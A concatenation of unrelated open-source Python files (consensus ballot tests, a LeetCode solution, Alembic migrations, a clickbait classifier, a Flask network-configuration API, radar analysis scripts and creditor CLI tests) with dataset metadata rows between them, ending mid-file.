    ballot_init_4 = Ballot(ballot_id, node_name_4, message, IsaacState.INIT, BallotVotingResult.agree,
                           ballot_init_2.timestamp)

    bc1.receive_ballot(ballot_init_2)
    bc1.receive_ballot(ballot_init_3)
    bc1.receive_ballot(ballot_init_4)

    assert bc1.consensus.slot.get_ballot_state(ballot_init_2) == IsaacState.SIGN

    ballot_sign_2 = Ballot(ballot_id, node_name_2, message, IsaacState.ACCEPT, BallotVotingResult.agree,
                           ballot_init_2.timestamp)
    ballot_sign_3 = Ballot(ballot_id, node_name_3, message, IsaacState.SIGN, BallotVotingResult.agree,
                           ballot_init_2.timestamp)
    ballot_sign_4 = Ballot(ballot_id, node_name_4, message, IsaacState.SIGN, BallotVotingResult.agree,
                           ballot_init_2.timestamp)

    bc1.receive_ballot(ballot_sign_2)
    bc1.receive_ballot(ballot_sign_3)
    bc1.receive_ballot(ballot_sign_4)

    assert bc1.consensus.slot.get_ballot_state(ballot_init_2) == IsaacState.ACCEPT

    ballot_accept_3 = Ballot(ballot_id, node_name_3, message, IsaacState.ACCEPT, BallotVotingResult.agree,
                             ballot_init_2.timestamp)
    ballot_accept_4 = Ballot(ballot_id, node_name_4, message, IsaacState.ACCEPT, BallotVotingResult.agree,
                             ballot_init_2.timestamp)

    bc1.receive_ballot(ballot_accept_3)
    bc1.receive_ballot(ballot_accept_4)

    assert message in bc1.consensus.messages
def test_next_message():
    node_name_1 = 'http://localhost:5001'
    node_name_2 = 'http://localhost:5002'
    node_name_3 = 'http://localhost:5003'
    node_name_4 = 'http://localhost:5004'

    bc1 = blockchain_factory(
        node_name_1,
        'http://localhost:5001',
        100,
        [node_name_2, node_name_3, node_name_4],
    )
    bc2 = blockchain_factory(
        node_name_2,
        'http://localhost:5002',
        100,
        [node_name_1, node_name_3, node_name_4],
    )
    bc3 = blockchain_factory(
        node_name_3,
        'http://localhost:5003',
        100,
        [node_name_1, node_name_2, node_name_4],
    )
    bc4 = blockchain_factory(
        node_name_4,
        'http://localhost:5004',
        100,
        [node_name_1, node_name_2, node_name_3],
    )

    bc1.consensus.add_to_validator_connected(bc2.node)
    bc1.consensus.add_to_validator_connected(bc3.node)
    bc1.consensus.add_to_validator_connected(bc4.node)
    bc1.consensus.init()

    message_1 = Message.new('message-1')
    ballot_init_2 = Ballot.new(node_name_2, message_1, IsaacState.INIT, BallotVotingResult.agree)
    ballot_id = ballot_init_2.ballot_id
    ballot_init_3 = Ballot(ballot_id, node_name_3, message_1, IsaacState.INIT, BallotVotingResult.agree,
                           ballot_init_2.timestamp)
    ballot_init_4 = Ballot(ballot_id, node_name_4, message_1, IsaacState.INIT, BallotVotingResult.agree,
                           ballot_init_2.timestamp)

    bc1.receive_ballot(ballot_init_2)
    bc1.receive_ballot(ballot_init_3)
    bc1.receive_ballot(ballot_init_4)

    assert bc1.consensus.slot.get_ballot_state(ballot_init_2) == IsaacState.SIGN

    ballot_sign_2 = Ballot(ballot_id, node_name_2, message_1, IsaacState.ACCEPT, BallotVotingResult.agree,
                           ballot_init_2.timestamp)
    ballot_sign_3 = Ballot(ballot_id, node_name_3, message_1, IsaacState.SIGN, BallotVotingResult.agree,
                           ballot_init_2.timestamp)
    ballot_sign_4 = Ballot(ballot_id, node_name_4, message_1, IsaacState.SIGN, BallotVotingResult.agree,
                           ballot_init_2.timestamp)

    bc1.receive_ballot(ballot_sign_2)
    bc1.receive_ballot(ballot_sign_3)
    bc1.receive_ballot(ballot_sign_4)

    assert bc1.consensus.slot.get_ballot_state(ballot_init_2) == IsaacState.ACCEPT

    ballot_accept_3 = Ballot(ballot_id, node_name_3, message_1, IsaacState.ACCEPT, BallotVotingResult.agree,
                             ballot_init_2.timestamp)
    ballot_accept_4 = Ballot(ballot_id, node_name_4, message_1, IsaacState.ACCEPT, BallotVotingResult.agree,
                             ballot_init_2.timestamp)

    bc1.receive_ballot(ballot_accept_3)
    bc1.receive_ballot(ballot_accept_4)

    assert message_1 in bc1.consensus.messages

    message_2 = Message.new('message-2')
    ballot_init_2 = Ballot.new(node_name_2, message_2, IsaacState.INIT, BallotVotingResult.agree)
    ballot_id_2 = ballot_init_2.ballot_id

    ballot_init_2.ballot_id = ballot_id_2
    ballot_init_3.ballot_id = ballot_id_2
    ballot_init_4.ballot_id = ballot_id_2
    ballot_init_2.timestamp = ballot_init_2.timestamp
    ballot_init_3.timestamp = ballot_init_2.timestamp
    ballot_init_4.timestamp = ballot_init_2.timestamp
    ballot_init_2.message = message_2
    ballot_init_3.message = message_2
    ballot_init_4.message = message_2

    bc1.receive_ballot(ballot_init_2)
    bc1.receive_ballot(ballot_init_3)
    bc1.receive_ballot(ballot_init_4)

    assert bc1.consensus.slot.get_ballot_state(ballot_init_2) == IsaacState.SIGN

    ballot_sign_2.ballot_id = ballot_id_2
    ballot_sign_3.ballot_id = ballot_id_2
    ballot_sign_4.ballot_id = ballot_id_2
    ballot_sign_2.timestamp = ballot_init_2.timestamp
    ballot_sign_3.timestamp = ballot_init_2.timestamp
    ballot_sign_4.timestamp = ballot_init_2.timestamp
    ballot_sign_2.message = message_2
    ballot_sign_3.message = message_2
    ballot_sign_4.message = message_2

    bc1.receive_ballot(ballot_sign_2)
    bc1.receive_ballot(ballot_sign_3)
    bc1.receive_ballot(ballot_sign_4)

    assert bc1.consensus.slot.get_ballot_state(ballot_init_2) == IsaacState.ACCEPT

    ballot_accept_3.ballot_id = ballot_id_2
    ballot_accept_4.ballot_id = ballot_id_2
    ballot_accept_3.message = message_2
    ballot_accept_4.message = message_2
    ballot_accept_3.timestamp = ballot_init_2.timestamp
    ballot_accept_4.timestamp = ballot_init_2.timestamp

    bc1.receive_ballot(ballot_accept_3)
    bc1.receive_ballot(ballot_accept_4)

    assert message_1 in bc1.consensus.messages
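All of these tests drive ballots through INIT, SIGN, and ACCEPT against a 100% threshold, where a ballot advances only once enough validators agree. A hypothetical sketch of that quorum arithmetic, independent of the consensus classes above:

```python
# Illustration-only quorum check: a state transition fires when the share of
# agreeing validators meets the configured threshold percentage.
def reached_threshold(agree_count, n_validators, threshold_percent):
    # Integer arithmetic avoids float comparison issues
    return agree_count * 100 >= n_validators * threshold_percent


print(reached_threshold(2, 3, 100))  # False: one validator still missing
print(reached_threshold(3, 3, 100))  # True: unanimous, as these tests require
```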
# === problems/python/reverse_integer.py (kcc3/leetcode-solutions, MIT) ===
def reverse(x):
"""Given a 32-bit signed integer, reverse digits of an integer.
Solve:
Cast int to a string and use string slicing to easily do reversing
Args:
x (int): integer to reverse
Returns:
int: reversed integer or 0 if it exceeds the 32-bit signed integer range: [−2^31, 2^31 − 1]
"""
s = str(x)
negative = False
if s[0] == "-":
negative = True
s = s[1:]
s = s[::-1]
if negative:
s = "-" + s
return 0 if int(s) > 2 ** 31 - 1 or int(s) < -2 ** 31 else int(s)
if __name__ == "__main__":
assert reverse(123) == 321
assert reverse(-123) == -321
assert reverse(120) == 21
assert reverse(-120) == -21
assert reverse(2**32) == 0
assert reverse(-2**33) == 0
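The same problem can be solved without strings. A sketch of an arithmetic variant (`reverse_arith` is an added illustration, not part of the original solution): it peels digits off with divmod and applies the same 32-bit overflow guard.

```python
# Arithmetic digit reversal: same contract as reverse(), no string conversion.
def reverse_arith(x):
    sign = -1 if x < 0 else 1
    x, result = abs(x), 0
    while x:
        x, digit = divmod(x, 10)     # strip the last digit
        result = result * 10 + digit  # append it to the reversed number
    result *= sign
    # Clamp to 0 outside the 32-bit signed range, as the problem requires
    return result if -2 ** 31 <= result <= 2 ** 31 - 1 else 0


print(reverse_arith(-123))  # -321
```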
# === alembic/versions/3ea865991c72_create_user_notification_table.py (modist-io/modist-api, 0BSD) ===
"""Create user_notification table.
Revision ID: 3ea865991c72
Revises: 4e8c8d41f23f
Create Date: 2020-04-15 18:43:23.856094
"""
import sqlalchemy as sa
from sqlalchemy.dialects import postgresql
from alembic import op
# revision identifiers, used by Alembic.
revision = "3ea865991c72"
down_revision = "4e8c8d41f23f"
branch_labels = None
depends_on = None
def upgrade():
    """Pushes changes into the database."""
    op.create_table(
        "user_notification",
        sa.Column(
            "created_at",
            sa.DateTime(timezone=True),
            server_default=sa.text("now()"),
            nullable=False,
        ),
        sa.Column(
            "updated_at",
            sa.DateTime(timezone=True),
            server_default=sa.text("now()"),
            nullable=False,
        ),
        sa.Column("user_id", postgresql.UUID(as_uuid=True), nullable=False),
        sa.Column("notification_id", postgresql.UUID(as_uuid=True), nullable=False),
        sa.ForeignKeyConstraint(
            ["notification_id"], ["notification.id"], ondelete="cascade"
        ),
        sa.ForeignKeyConstraint(["user_id"], ["user.id"], ondelete="cascade"),
        sa.PrimaryKeyConstraint("user_id", "notification_id"),
    )
    op.create_refresh_updated_at_trigger("user_notification")


def downgrade():
    """Reverts changes performed by upgrade()."""
    op.drop_refresh_updated_at_trigger("user_notification")
    op.drop_table("user_notification")
| 27.660377 | 84 | 0.65075 | 161 | 1,466 | 5.73913 | 0.409938 | 0.08658 | 0.064935 | 0.068182 | 0.318182 | 0.318182 | 0.233766 | 0.233766 | 0.233766 | 0.145022 | 0 | 0.045574 | 0.221692 | 1,466 | 52 | 85 | 28.192308 | 0.764242 | 0.159618 | 0 | 0.323529 | 0 | 0 | 0.184514 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.058824 | false | 0 | 0.088235 | 0 | 0.147059 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bb48c15a637195ee193c14fecf22f1af1ff953ad | 813 | py | Python | migrations/versions/0974ecc7059c_protocols_table_add_col_is_cool.py | Spin14/wolf-backend | 21fc9d1a0df092eaa6a533149a165d2898f5fe40 | [
"MIT"
] | 2 | 2020-01-04T17:46:20.000Z | 2020-01-19T17:41:38.000Z | migrations/versions/0974ecc7059c_protocols_table_add_col_is_cool.py | Spin14/wolf-backend | 21fc9d1a0df092eaa6a533149a165d2898f5fe40 | [
"MIT"
] | 7 | 2019-05-06T01:42:12.000Z | 2019-05-14T23:22:54.000Z | migrations/versions/0974ecc7059c_protocols_table_add_col_is_cool.py | Spin14/wolf-backend | 21fc9d1a0df092eaa6a533149a165d2898f5fe40 | [
"MIT"
] | 1 | 2019-09-24T21:15:52.000Z | 2019-09-24T21:15:52.000Z | """protocols table: add col is cool
Revision ID: 0974ecc7059c
Revises: a5d44f24dd74
Create Date: 2019-05-12 01:17:23.068006
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '0974ecc7059c'
down_revision = 'a5d44f24dd74'
branch_labels = None
depends_on = None
def upgrade():
    # ### commands auto generated by Alembic - please adjust! ###
    with op.batch_alter_table('protocols', schema=None) as batch_op:
        batch_op.add_column(sa.Column('is_cool', sa.Boolean(), nullable=True))
    # ### end Alembic commands ###


def downgrade():
    # ### commands auto generated by Alembic - please adjust! ###
    with op.batch_alter_table('protocols', schema=None) as batch_op:
        batch_op.drop_column('is_cool')
    # ### end Alembic commands ###
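In plain SQL, the upgrade amounts to adding one nullable boolean column. Alembic's `batch_alter_table` exists because SQLite historically supported little beyond `ADD COLUMN`, so batch mode recreates the table behind the scenes; the add-column case itself is direct:

```python
# Plain-SQL equivalent of upgrade(): add a nullable is_cool column.
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE protocols (id INTEGER PRIMARY KEY)")
conn.execute("ALTER TABLE protocols ADD COLUMN is_cool BOOLEAN")
# PRAGMA table_info rows are (cid, name, type, notnull, dflt_value, pk)
cols = [row[1] for row in conn.execute("PRAGMA table_info(protocols)")]
print(cols)  # ['id', 'is_cool']
```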
# === avalon/__main__.py (noflame/core, MIT) ===
import argparse
from . import pipeline
if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    parser.add_argument("--creator", action="store_true",
                        help="Launch Instance Creator in standalone mode")
    parser.add_argument("--loader", action="store_true",
                        help="Launch Asset Loader in standalone mode")
    parser.add_argument("--manager", action="store_true",
                        help="Launch Manager in standalone mode")
    parser.add_argument("--projectmanager", action="store_true",
                        help="Launch Project Manager in standalone mode")
    parser.add_argument("--root",
                        help="Absolute path to root directory of assets")

    args, unknown = parser.parse_known_args()

    host = pipeline.debug_host()
    pipeline.register_host(host)

    if args.creator:
        from .tools import creator
        creator.show(debug=True)

    elif args.loader:
        from .tools import loader
        loader.show(debug=True)

    elif args.manager:
        from .tools import manager
        manager.show(debug=True)

    elif args.projectmanager:
        from .tools import projectmanager
        projectmanager.cli(unknown)
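The entry point uses `parse_known_args()` rather than `parse_args()` so that flags it does not recognize survive and can be forwarded (here, to `projectmanager.cli`). A minimal stand-alone illustration of that behavior:

```python
# parse_known_args() returns (parsed_namespace, leftover_argv): known flags are
# consumed, everything else is passed through untouched.
import argparse

parser = argparse.ArgumentParser()
parser.add_argument("--projectmanager", action="store_true")
args, unknown = parser.parse_known_args(["--projectmanager", "--extra", "value"])
print(args.projectmanager, unknown)  # True ['--extra', 'value']
```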
# === Codementor.io/GarethDwyer/apps/clickbait/clickbait_classifier.py (nitin-cherian/Webapps, MIT) ===
# clickbait_classifier.py
# Import libraries
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.svm import LinearSVC
from sklearn.metrics import accuracy_score
# globals
DATA_SET_FILE = "clickbait.txt"
def is_clickbait(text):
    # Note: this retrains the model on every call; cache classifier() for reuse.
    svm, vectorizer = classifier()

    # Vectorize the text. Input needs to be an iterable
    vector = vectorizer.transform([text])

    # Predict using the classifier
    prediction = svm.predict(vector)

    # if prediction is '1', return True else False
    return True if prediction[0] == '1' else False


def load_data(file):
    # Load data from dataset into Python lists
    with open(file) as f:
        lines = [line.strip().split("\t") for line in f]
    headlines, labels = zip(*lines)
    return headlines, labels


def classifier():
    headlines, labels = load_data(DATA_SET_FILE)

    # Break dataset into train and test sets
    train_headlines = headlines[:8000]
    test_headlines = headlines[8000:]
    train_labels = labels[:8000]
    test_labels = labels[8000:]

    # Create a vectorizer and classifier
    vectorizer = TfidfVectorizer()
    svm = LinearSVC()

    # Transform our text data into numerical vectors
    train_vector = vectorizer.fit_transform(train_headlines)

    # Train the classifier
    svm.fit(train_vector, train_labels)

    # Test accuracy of our classifier
    test_vector = vectorizer.transform(test_headlines)
    predictions = svm.predict(test_vector)
    print(accuracy_score(predictions, test_labels))

    return svm, vectorizer


def main():
    classifier()


if __name__ == '__main__':
    main()
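`load_data()` expects one tab-separated `"<headline>\t<label>"` pair per line in `clickbait.txt`, with string labels (`'1'` for clickbait). A self-contained sketch of that parse on two hypothetical sample rows, with no sklearn dependency:

```python
# Parse two sample rows the way load_data() does: strip, split on tab,
# then zip(*pairs) to transpose the pairs into parallel tuples.
lines = "You Won't Believe This\t1\nFed raises interest rates\t0".split("\n")
headlines, labels = zip(*(line.split("\t") for line in lines))
print(headlines)  # ("You Won't Believe This", 'Fed raises interest rates')
print(labels)     # ('1', '0')
```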
# === commands/google_search.py (UnityRobbie/bottomly, MIT) ===
import warnings
from commands.abstract_command import AbstractCommand
from config import ConfigKeys, Config
from googleapiclient.discovery import build
class GoogleSearchCommand(AbstractCommand):
    def get_purpose(self):
        return "Performs a Google search and returns the top hit."

    def execute(self, search_term):
        with warnings.catch_warnings():
            warnings.simplefilter("ignore")
            if search_term is None or search_term == '':
                return None
            service = build("customsearch", "v1", developerKey=self.api_key)
            results = service.cse().list(q=search_term, cx=self.cse_id, num=1).execute()
            if self._result_set_is_empty(results):
                return None
            return results['items'][0]

    def _result_set_is_empty(self, results):
        return results['searchInformation']['totalResults'] == '0'

    def __init__(self):
        # The original `super(GoogleSearchCommand, self)` was a no-op;
        # actually invoke the base initializer.
        super(GoogleSearchCommand, self).__init__()
        config = Config()
        self.api_key = config.get_config_value(ConfigKeys.google_api_key)
        self.cse_id = config.get_config_value(ConfigKeys.google_cse_id)
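The empty-result guard is worth isolating: Custom Search responses report the hit count as a *string* under `searchInformation.totalResults`, so the comparison is against `'0'`, not `0`. A dependency-free sketch of the same check against stubbed response dicts:

```python
# Same predicate as _result_set_is_empty, exercised on stubbed CSE responses.
def result_set_is_empty(results):
    return results['searchInformation']['totalResults'] == '0'


print(result_set_is_empty({'searchInformation': {'totalResults': '0'}}))   # True
print(result_set_is_empty({'searchInformation': {'totalResults': '12'}}))  # False
```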
# === CHIMAclient/client_api.py (ANTLab-polimi/CHIMA, Apache-2.0) ===
#!/usr/bin/python3
from flask import Flask
from flask import request
from flask import send_file

app = Flask(__name__)

# To suppress Flask's request logs on stdout
import logging

from config import *
from mpls import *
from utils import *
from encapsulator.userspace import *

# Configured with StubAPI's constructor
CLIENT_FLASK_HOST = ""
CLIENT_FLASK_PORT = ""


class ClientAPI:
    # Flask view functions can't be defined in a class.
    # Configuration parameters are set as global variables through this class.
    def __init__(self, host, port):
        global CLIENT_FLASK_HOST, CLIENT_FLASK_PORT
        CLIENT_FLASK_HOST = host
        CLIENT_FLASK_PORT = port


# Runs the Flask server (intended to be run in a thread)
def run_client_server():
    if not conf.debug:
        log = logging.getLogger('werkzeug')
        log.setLevel(logging.ERROR)
    app.run(host=CLIENT_FLASK_HOST, port=CLIENT_FLASK_PORT)


# Add a new destination / stack association
@app.route('/path', methods=['POST'])
def add_destination():
    data = request.json
    new = mpls_stack()
    for val in data["stack"]:
        new.add_label(val)
    print("New path %s -> %s, stack: %s, size: %d" % (data["src"], data["dst"], new, new.size))
    src = ip2int(data["src"])
    dst = ip2int(data["dst"])
    conf.destinations.append((src, dst))
    conf.encap.map_inject(src, dst, new)
    return "OK"


# Delete a destination
@app.route('/path', methods=['DELETE'])
def del_destination():
    data = request.json
    print("Deleting path %s -> %s" % (data["src"], data["dst"]))
    src = ip2int(data["src"])
    dst = ip2int(data["dst"])
    if (src, dst) in conf.destinations:
        conf.destinations.remove((src, dst))
        conf.encap.map_remove(src, dst)
    return "OK"


# Install a new IP route
@app.route('/route', methods=['POST'])
def new_route():
    data = request.json
    set_route(conf.interface, data["subnet"])
    conf.installed_subnets.append(data["subnet"])
    return "OK"


# Remove an IP route
@app.route('/route', methods=['DELETE'])
def del_route():
    data = request.json
    remove_route(data["subnet"])
    if data["subnet"] in conf.installed_subnets:
        conf.installed_subnets.remove(data["subnet"])
    return "OK"


# Install a new static ARP entry
@app.route('/arp', methods=['POST'])
def new_arp():
    data = request.json
    set_arp(conf.interface, data["ip"], data["mac"])
    conf.installed_ips.append(data["ip"])
    return "OK"


# Remove a static ARP entry
@app.route('/arp', methods=['DELETE'])
def del_arp():
    data = request.json
    remove_arp(conf.interface, data["ip"])
    if data["ip"] in conf.installed_ips:
        conf.installed_ips.remove(data["ip"])
    return "OK"


# Assign a new IP address
@app.route('/ip', methods=['POST'])
def new_ip():
    data = request.json
    set_ip(conf.interface, data["ip"])
    return "OK"


# Remove an IP address
@app.route('/ip', methods=['DELETE'])
def del_ip():
    data = request.json
    remove_ip(conf.interface, data["ip"])
    return "OK" | 24.766667 | 96 | 0.659825 | 418 | 2,972 | 4.569378 | 0.253589 | 0.046073 | 0.062827 | 0.039791 | 0.231937 | 0.174346 | 0.095288 | 0.072251 | 0.038743 | 0 | 0 | 0.002082 | 0.19179 | 2,972 | 120 | 97 | 24.766667 | 0.793089 | 0.131898 | 0 | 0.25 | 0 | 0 | 0.091936 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0 | 0.1 | 0 | 0.3375 | 0.025 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
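The route handlers above rely on an `ip2int` helper imported from `utils`, which is not shown in this file. A minimal sketch of what such a dotted-quad-to-integer conversion could look like, using only the standard library — the exact behavior of the real helper is an assumption based on how it is called above:

```python
import socket
import struct


def ip2int(ip):
    # Pack the dotted-quad string into 4 network-order bytes,
    # then unpack those bytes as one unsigned 32-bit integer.
    return struct.unpack("!I", socket.inet_aton(ip))[0]


def int2ip(n):
    # Inverse conversion: a 32-bit integer back to a dotted-quad string.
    return socket.inet_ntoa(struct.pack("!I", n))


print(ip2int("10.0.0.1"))   # 167772161
print(int2ip(167772161))    # 10.0.0.1
```

Storing addresses as integers, as `conf.destinations` does, makes tuple membership tests and map lookups cheap and unambiguous.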
bb4d5f68daee5cc9ce1c6b5d3a404612daf578b0 | 1,225 | py | Python | tests/getHighIntensityRegionEdgeTest.py | yaukwankiu/armor | 6c57df82fe3e7761f43f9fbfe4f3b21882c91436 | [
"CC0-1.0"
] | 1 | 2015-11-06T06:41:33.000Z | 2015-11-06T06:41:33.000Z | tests/getHighIntensityRegionEdgeTest.py | yaukwankiu/armor | 6c57df82fe3e7761f43f9fbfe4f3b21882c91436 | [
"CC0-1.0"
] | null | null | null | tests/getHighIntensityRegionEdgeTest.py | yaukwankiu/armor | 6c57df82fe3e7761f43f9fbfe4f3b21882c91436 | [
"CC0-1.0"
] | null | null | null | import itertools
import numpy as np
import time

from armor import pattern
from armor import objects4 as ob

outputFolder = '/media/TOSHIBA EXT/ARMOR/labLogs2/charts2_local_features_distribution/misc/'

thres = 35


def getXY(a, name='', thres=thres):
    a1 = a.levelSet(thres)
    a1.show()
    I, J = np.where(a.matrix == thres)
    I = I.compressed()
    J = J.compressed()
    X, Y = J, I
    coords = [(X[i], Y[i]) for i in range(len(X))]
    coordsString = '\n'.join([str(X[i]) + " " + str(Y[i]) for i in range(len(X))])
    fileName = 'coords' + str(thres) + name + "_" + str(int(time.time())) + '.dat'
    open(outputFolder + fileName, 'w').write(coordsString)
    print("changes written to", fileName)
    return {'X': X, "Y": Y}


a = pattern.a
a.load()
getXY(a, a.name, thres)

thres = 20
wrf = ob.kongreywrf2
wrf.fix()
# k = wrf[212].load()
ks = [v for v in wrf if v.dataTime == '20130829.1200']
k = ks[13]
k.above(thres - 0.1).connectedComponents().show()
k1 = k.above(thres - 0.1).connectedComponents()
k1.levelSet(2).show()
k2 = k1.levelSet(2) * k.levelSet(20)
k2.setMaxMin()
k2.show()
k3 = k1.levelSet(2)
k_ = k * -1
k_ = k_.above(-thres - 0.1)
k4 = k_ * k3
k4.setMaxMin()
k4.show()
k4.matrix.sum()
d = getXY(k4, k.name + "threshold20_", 2)
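`getXY` extracts the (x, y) pixel coordinates at which a matrix equals a threshold. The core pattern — `np.where` on an equality mask, then pairing column indices as x with row indices as y — can be sketched in isolation (the function name here is illustrative, not part of the armor package):

```python
import numpy as np


def coords_at_level(matrix, thres):
    # Rows (I) map to y, columns (J) map to x, as in getXY above.
    I, J = np.where(matrix == thres)
    return [(int(x), int(y)) for x, y in zip(J, I)]


m = np.array([[0, 35, 0],
              [35, 0, 0]])
print(coords_at_level(m, 35))  # [(1, 0), (0, 1)]
```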
| 24.019608 | 92 | 0.62449 | 200 | 1,225 | 3.78 | 0.415 | 0.02381 | 0.043651 | 0.047619 | 0.146825 | 0.12963 | 0.044974 | 0.044974 | 0 | 0 | 0 | 0.055833 | 0.181224 | 1,225 | 50 | 93 | 24.5 | 0.697906 | 0.01551 | 0 | 0 | 0 | 0 | 0.113693 | 0.049793 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.075 | null | null | 0.025 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
bb4daa67b3a7c1bebded6811d734bba3fae430ae | 105 | py | Python | wcics/mail/errors.py | CS-Center/CS-Center | 3cd09f29d214406e6618fc67b9faf59a18f3f11b | [
"MIT"
] | null | null | null | wcics/mail/errors.py | CS-Center/CS-Center | 3cd09f29d214406e6618fc67b9faf59a18f3f11b | [
"MIT"
] | 6 | 2019-12-06T18:06:28.000Z | 2021-12-01T20:19:05.000Z | wcics/mail/errors.py | CS-Center/CS-Center | 3cd09f29d214406e6618fc67b9faf59a18f3f11b | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
class MailError(Exception):
    def __init__(self, addrs):
        self.failed = addrs | 21 | 28 | 0.647619 | 13 | 105 | 4.923077 | 0.846154 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.011628 | 0.180952 | 105 | 5 | 29 | 21 | 0.732558 | 0.2 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 4 |
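A short usage sketch of the exception above — collecting failed addresses from a hypothetical send loop. The class is restated so the snippet is self-contained, and `send_all`/`send_one` are illustrative names, not part of the module:

```python
class MailError(Exception):
    def __init__(self, addrs):
        self.failed = addrs


def send_all(addrs, send_one):
    # Attempt every address, then raise once at the end with the failures,
    # so one bad address does not block delivery to the rest.
    failed = [a for a in addrs if not send_one(a)]
    if failed:
        raise MailError(failed)


try:
    send_all(["a@x.org", "bad@y.org"], lambda a: not a.startswith("bad"))
except MailError as e:
    print(e.failed)  # ['bad@y.org']
```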
bb4ee9418756d227fb920b5482b1a70d72f470a7 | 5,163 | py | Python | tests/test_cli.py | epandurski/swpt_creditors | 35b9c6fa8ec84fe26e203a2604aff9cd5280dc4c | [
"MIT"
] | null | null | null | tests/test_cli.py | epandurski/swpt_creditors | 35b9c6fa8ec84fe26e203a2604aff9cd5280dc4c | [
"MIT"
] | null | null | null | tests/test_cli.py | epandurski/swpt_creditors | 35b9c6fa8ec84fe26e203a2604aff9cd5280dc4c | [
"MIT"
] | 1 | 2020-01-16T13:24:31.000Z | 2020-01-16T13:24:31.000Z | import logging
from datetime import date, timedelta

from swpt_creditors import procedures as p
from swpt_creditors import models as m

D_ID = -1
C_ID = 4294967296


def _create_new_creditor(creditor_id: int, activate: bool = False):
    creditor = p.reserve_creditor(creditor_id)
    if activate:
        p.activate_creditor(creditor_id, creditor.reservation_id)


def test_process_ledger_entries(app, db_session, current_ts):
    _create_new_creditor(C_ID, activate=True)
    p.create_new_account(C_ID, D_ID)

    params = {
        'debtor_id': D_ID,
        'creditor_id': C_ID,
        'creation_date': date(2020, 1, 1),
        'last_change_ts': current_ts,
        'last_change_seqnum': 1,
        'principal': 1000,
        'interest': 0.0,
        'interest_rate': 5.0,
        'last_interest_rate_change_ts': current_ts,
        'transfer_note_max_bytes': 500,
        'last_config_ts': current_ts,
        'last_config_seqnum': 1,
        'negligible_amount': 0.0,
        'config_flags': 0,
        'config_data': '',
        'account_id': str(C_ID),
        'debtor_info_iri': 'http://example.com',
        'debtor_info_content_type': None,
        'debtor_info_sha256': None,
        'last_transfer_number': 0,
        'last_transfer_committed_at': current_ts,
        'ts': current_ts,
        'ttl': 100000,
    }
    p.process_account_update_signal(**params)

    params = {
        'debtor_id': D_ID,
        'creditor_id': C_ID,
        'creation_date': date(2020, 1, 1),
        'transfer_number': 1,
        'coordinator_type': 'direct',
        'sender': '666',
        'recipient': str(C_ID),
        'acquired_amount': 200,
        'transfer_note_format': 'json',
        'transfer_note': '{"message": "test"}',
        'committed_at': current_ts,
        'principal': 200,
        'ts': current_ts,
        'previous_transfer_number': 0,
        'retention_interval': timedelta(days=5),
    }
    p.process_account_transfer_signal(**params)
    params['transfer_number'] = 2
    params['principal'] = 400
    params['previous_transfer_number'] = 1
    p.process_account_transfer_signal(**params)

    assert len(p.get_account_ledger_entries(C_ID, D_ID, prev=10000, count=10000)) == 0
    runner = app.test_cli_runner()
    result = runner.invoke(args=['swpt_creditors', 'process_ledger_updates', '--burst=1', '--quit-early', '--wait=0'])
    assert not result.output
    assert len(p.get_account_ledger_entries(C_ID, D_ID, prev=10000, count=10000)) == 2


def test_process_log_additions(app, db_session, current_ts):
    _create_new_creditor(C_ID, activate=True)
    p.create_new_account(C_ID, D_ID)
    latest_update_id = p.get_account_config(C_ID, D_ID).config_latest_update_id
    p.update_account_config(
        creditor_id=C_ID,
        debtor_id=D_ID,
        is_scheduled_for_deletion=True,
        negligible_amount=1e30,
        allow_unsafe_deletion=False,
        latest_update_id=latest_update_id + 1,
    )
    entries1, _ = p.get_log_entries(C_ID, count=10000)
    runner = app.test_cli_runner()
    result = runner.invoke(args=['swpt_creditors', 'process_log_additions', '--wait=0', '--quit-early'])
    assert result.exit_code == 0
    assert not result.output
    entries2, _ = p.get_log_entries(C_ID, count=10000)
    assert len(entries2) > len(entries1)


def test_configure_interval(app, db_session, current_ts, caplog):
    caplog.at_level(logging.ERROR)
    ac = m.AgentConfig.query.one_or_none()
    if ac and ac.min_creditor_id == m.MIN_INT64:
        min_creditor_id = m.MIN_INT64 + 1
        max_creditor_id = m.MAX_INT64
    else:
        min_creditor_id = m.MIN_INT64
        max_creditor_id = m.MAX_INT64
    runner = app.test_cli_runner()

    caplog.clear()
    result = runner.invoke(args=[
        'swpt_creditors', 'configure_interval', '--', str(m.MIN_INT64 - 1), '-1'])
    assert result.exit_code != 0
    assert 'not a valid creditor ID' in caplog.text

    caplog.clear()
    result = runner.invoke(args=[
